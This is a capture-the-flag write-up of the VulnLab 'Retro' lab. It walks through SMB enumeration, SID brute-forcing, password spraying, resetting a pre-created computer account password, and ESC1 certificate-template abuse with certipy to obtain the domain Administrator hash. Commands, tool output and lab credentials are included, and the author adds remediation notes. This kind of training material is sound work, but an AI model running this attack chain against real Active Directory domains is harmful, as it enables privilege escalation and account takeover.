Penetration Testing - Retro - VulnLab
Enrique A.
CRTP | PNPT | ARTA | Security Engineer with 9 + years of experience in network penetration testing, AD testing, Linux Server Testing and web application security testing.
Intro
This machine may have been considered an "easy" challenge, but it still offers valuable insights for red teamers in real-world engagements. The machine's vulnerabilities, including the misconfigured Active Directory Certificate Services (ADCS), serve as a stark reminder of the importance of secure certificate management. The ease with which we were able to exploit the certificate template allowed us to escalate privileges and gain access to the machine, highlighting the critical need for proper permissions and access controls in real-world environments. By understanding these vulnerabilities, red teams can better prepare for similar scenarios in real-world engagements, emphasizing the importance of thorough security checks and regular updates.
Running Nmap
─$ sudo nmap -sV -sC -Pn 10.10.94.109 | tee nmapresults.txt
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-24 22:43 EEST
Nmap scan report for 10.10.94.109
Host is up (0.044s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-05-24 19:43:14Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.retro.vl
| Not valid before: 2023-07-23T21:06:31
|_Not valid after: 2024-07-22T21:06:31
|_ssl-date: TLS randomness does not represent time
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.retro.vl
| Not valid before: 2023-07-23T21:06:31
|_Not valid after: 2024-07-22T21:06:31
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.retro.vl
| Not valid before: 2023-07-23T21:06:31
|_Not valid after: 2024-07-22T21:06:31
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.retro.vl
| Not valid before: 2023-07-23T21:06:31
|_Not valid after: 2024-07-22T21:06:31
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2024-05-24T19:44:35+00:00; +1s from scanner time.
| rdp-ntlm-info:
| Target_Name: RETRO
| NetBIOS_Domain_Name: RETRO
| NetBIOS_Computer_Name: DC
| DNS_Domain_Name: retro.vl
| DNS_Computer_Name: DC.retro.vl
| DNS_Tree_Name: retro.vl
| Product_Version: 10.0.20348
|_ System_Time: 2024-05-24T19:43:55+00:00
| ssl-cert: Subject: commonName=DC.retro.vl
| Not valid before: 2024-05-23T19:21:56
|_Not valid after: 2024-11-22T19:21:56
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2024-05-24T19:43:59
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 93.03 seconds
Besides the ports. Nmap is showing that the domain is retro.vl
Enumerating Shares
└─$ smbclient -L 10.10.94.109
Password for [WORKGROUP\kali]:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Notes Disk
SYSVOL Disk Logon server share
Trainees Disk
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.94.109 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
The following shares are default in all systems and most likely won't accept an anonymous user to read them: ADMIN, C, IPC, NETLOGON, SYSVOL.
I am seeing the folling shares could have some juicy info: Notes and Trainees.
┌──(kali?kali)-[~/Documents/VulnLab/Retro]
└─$ smbclient \\\\10.10.94.109\\Notes
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> dir
NT_STATUS_ACCESS_DENIED listing \*
smb: \> ^C
┌──(kali?kali)-[~/Documents/VulnLab/Retro]
└─$ smbclient \\\\10.10.94.109\\Trainees
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Mon Jul 24 00:58:43 2023
.. DHS 0 Wed Jul 26 12:54:14 2023
Important.txt A 288 Mon Jul 24 01:00:13 2023
6261499 blocks of size 4096. 2240556 blocks available
smb: \> get important.txt
getting file \important.txt of size 288 as important.txt (1.6 KiloBytes/sec) (average 1.6 KiloBytes/sec)
smb: \> exit
Exfiltrated file "Important.txt" .... This is the content:
└─$ cat important.txt
Dear Trainees,
I know that some of you seemed to struggle with remembering strong and unique passwords.
So we decided to bundle every one of you up into one account.
Stop bothering us. Please. We have other stuff to do than resetting your password every day.
Regards
The Admins
This gives us a clue that there could be a user named trainee or trainees in the system. We can verify this by using "Impacket-lookupsid" or by bruteforcing our way in (in case the password is in our password file).
Impacket-LookupSid
This is a tool that is part of the Impacket suite. This specific tool is used to query a Windows server for its Security Identifier (SID) and to enumerate the list of user and group accounts associated with that SID.
─$ impacket-lookupsid [email protected] -no-pass
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Brute forcing SIDs at 10.10.94.109
[*] StringBinding ncacn_np:10.10.94.109[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-2983547755-698260136-4283918172
498: RETRO\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: RETRO\Administrator (SidTypeUser)
501: RETRO\Guest (SidTypeUser)
502: RETRO\krbtgt (SidTypeUser)
512: RETRO\Domain Admins (SidTypeGroup)
513: RETRO\Domain Users (SidTypeGroup)
514: RETRO\Domain Guests (SidTypeGroup)
515: RETRO\Domain Computers (SidTypeGroup)
516: RETRO\Domain Controllers (SidTypeGroup)
517: RETRO\Cert Publishers (SidTypeAlias)
518: RETRO\Schema Admins (SidTypeGroup)
519: RETRO\Enterprise Admins (SidTypeGroup)
520: RETRO\Group Policy Creator Owners (SidTypeGroup)
521: RETRO\Read-only Domain Controllers (SidTypeGroup)
522: RETRO\Cloneable Domain Controllers (SidTypeGroup)
525: RETRO\Protected Users (SidTypeGroup)
526: RETRO\Key Admins (SidTypeGroup)
527: RETRO\Enterprise Key Admins (SidTypeGroup)
553: RETRO\RAS and IAS Servers (SidTypeAlias)
571: RETRO\Allowed RODC Password Replication Group (SidTypeAlias)
572: RETRO\Denied RODC Password Replication Group (SidTypeAlias)
1000: RETRO\DC$ (SidTypeUser)
1101: RETRO\DnsAdmins (SidTypeAlias)
1102: RETRO\DnsUpdateProxy (SidTypeGroup)
1104: RETRO\trainee (SidTypeUser)
1106: RETRO\BANKING$ (SidTypeUser)
1107: RETRO\jburley (SidTypeUser)
1108: RETRO\HelpDesk (SidTypeGroup)
1109: RETRO\tblack (SidTypeUser)
I will be adding all those users to a users.txt file. Also as we can see from the results, trainee is showing up there... so instead of bruteforcing or way in, we will try to password spray the server... to save some time, I extracted all words that have "trainee" in them and added them to passwordlist.txt instead of running the whole rockyou.txt file..(in my first attempt I ran the whole rockyou.txt)
Before we were unable to access the "notes" share, let's see if we can now access it with the trainee credentials:
└─$ smbclient \\\\10.10.94.109\\Notes -U trainee
Password for [WORKGROUP\trainee]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Mon Jul 24 01:03:16 2023
.. DHS 0 Wed Jul 26 12:54:14 2023
ToDo.txt A 248 Mon Jul 24 01:05:56 2023
6261499 blocks of size 4096. 2890576 blocks available
smb: \> get ToDo.txt
getting file \ToDo.txt of size 248 as ToDo.txt (1.3 KiloBytes/sec) (average 1.3 KiloBytes/sec)
smb: \> exit
┌──(kali?kali)-[~/Documents/VulnLab/Retro]
└─$ cat ToDo.txt
Thomas,
after convincing the finance department to get rid of their ancienct banking software
it is finally time to clean up the mess they made. We should start with the pre created
computer account. That one is older than me.
Best
James
Re-checking the results obtained with impacket-lookupsid, we can see that there is a banking computer (if it ends with $ is a hint that it is a computer account) :
As we noticed that the IT at this company is a little bit lazy.. it seems they have this pattern of using the same password as the username. We will try that with this account:
It works but we get the following message ("STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT") meaning that the password needs to be changed for this user:
The following article is super helpful and explains the "Status_NoLogon..) message properly: https://trustedsec.com/blog/diving-into-pre-created-computer-accounts
As per the article we need to modify /etc/krb5.conf with the following content:
[libdefaults]
default_realm = RETRO.VL
dns_lookup_realm = false
ticket_lifetime = 24h
renew_lifetime = 7d
rdns = false
kdc_timesync = 1
ccache_type = 4
forwardable = true
proxiable = true
[realms]
RETRO.VL = {
kdc = DC.RETRO.VL
admin_server = DC.RETRO.VL
then we need to run the following:
kpasswd BANKING$
The password was changed properly to Password123!!!
creds: banking:Password123!!!
领英推荐
Pwining the box
I tried a lot of stuff from here... tried looking for users to kerberoast, to perform as-rep roasting. Tried logging to the server with the trainee creds... nothing was working...
AD-CS misconfigurations
To start enumerating this, I tried with certipy.
Note: This machine was turned off since I forgot to extend the time so from now on the IP is going to be: 10.10.69.30
Running Certipy with the newly obtained user Banking$:
./certipy find -u 'BANKING$' -p 'Password123!!!' -vulnerable -stdout -dc-ip 10.10.69.30
certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Trying to get CA configuration for 'retro-DC-CA' via CSRA
[!] Got error while trying to get CA configuration for 'retro-DC-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'retro-DC-CA' via RRP
[*] Got CA configuration for 'retro-DC-CA'
[*] Enumeration output:
Certificate Authorities
0
CA Name : retro-DC-CA
DNS Name : DC.retro.vl
Certificate Subject : CN=retro-DC-CA, DC=retro, DC=vl
Certificate Serial Number : 7A107F4C115097984B35539AA62E5C85
Certificate Validity Start : 2023-07-23 21:03:51+00:00
Certificate Validity End : 2028-07-23 21:13:50+00:00
Web Enrollment : Disabled
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Permissions
Owner : RETRO.VL\Administrators
Access Rights
ManageCertificates : RETRO.VL\Administrators
RETRO.VL\Domain Admins
RETRO.VL\Enterprise Admins
ManageCa : RETRO.VL\Administrators
RETRO.VL\Domain Admins
RETRO.VL\Enterprise Admins
Enroll : RETRO.VL\Authenticated Users
Certificate Templates
0
Template Name : RetroClients
Display Name : Retro Clients
Certificate Authorities : retro-DC-CA
Enabled : True
Client Authentication : True
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : True
Certificate Name Flag : EnrolleeSuppliesSubject
Enrollment Flag : None
Private Key Flag : 16842752
Extended Key Usage : Client Authentication
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Validity Period : 1 year
Renewal Period : 6 weeks
Minimum RSA Key Length : 4096
Permissions
Enrollment Permissions
Enrollment Rights : RETRO.VL\Domain Admins
RETRO.VL\Domain Computers
RETRO.VL\Enterprise Admins
Object Control Permissions
Owner : RETRO.VL\Administrator
Write Owner Principals : RETRO.VL\Domain Admins
RETRO.VL\Enterprise Admins
RETRO.VL\Administrator
Write Dacl Principals : RETRO.VL\Domain Admins
RETRO.VL\Enterprise Admins
RETRO.VL\Administrator
Write Property Principals : RETRO.VL\Domain Admins
RETRO.VL\Enterprise Admins
RETRO.VL\Administrator
[!] Vulnerabilities
ESC1 : 'RETRO.VL\\Domain Computers' can enroll, enrollee supplies subject and template allows client authentication
The tool has discovered a vulnerability, which is marked as ESC1 (Enumerate Subjects Can Enroll):
* The vulnerability is related to a specific certificate template named "RetroClients" which is enabled and allows client authentication.
* The template is configured to allow the "RETRO.VL\Domain Computers" group to enroll for certificates.
* The issue arises because the template allows the enrollee (the entity requesting the certificate) to supply the subject (the identity information) of the certificate.
* This means that any member of the "RETRO.VL\Domain Computers" group (in our case BANKING$) can request a certificate with arbitrary subject information, which could lead to impersonation attacks or other security issues.
In simpler terms, this vulnerability allows any domain computer to request a certificate with any identity information, which could be used to impersonate other entities or gain unauthorized access to sensitive resources.
The potential impact of this vulnerability includes:
* Identity spoofing: An attacker could request a certificate with a fake identity, allowing them to impersonate another entity.
* Unauthorized access: An attacker could use the obtained certificate to access sensitive resources or systems, as the fake identity would be trusted by the system.
To remediate this vulnerability, the CA administrator should review the certificate template settings and restrict the enrollment permissions to only trusted entities, or require additional verification steps for certificate requests.
Let's Exploit it:
a) Let's request the administrator's certificate.
This command is using the CertiPy tool to request a certificate from the "retro-DC-CA" certificate authority. It's authenticating as the "BANKING$" user with the password "Password123!!!", and requesting a certificate with the "RetroClients" template for the "Administrator" user principal name (UPN). The certificate will have a 4096-bit key size. The target domain controller is "dc.retro.vl".
b) Let's authenticate with the PFX certificate and let's extract the administrator's hash:
certipy auth -pfx 'administrator.pfx' -username 'administrator' -domain 'retro.vl' -dc-ip 10.10.69.30
Now that we have the hash, we can proceed to log into the machine with the hash by using Evil-Winrm.
And with this we have completed this machine.
Conclusions
Retro machine served as a valuable learning experience for red teamers and security professionals. The discoverability of the certificate vulnerability, coupled with the ease of exploitation, underscores the importance of thorough security checks and regular updates in real-world environments. The misuse of certificate templates, exploiting the lack of enforcement of explicit user identity, and poor permissions control, serve as a warning for system administrators to review and update their settings.
Through this exercise, it was demonstrated the potential consequences of neglecting these security measures, emphasizing the importance of ongoing vigilance and proactive security measures in preventing real-world attacks.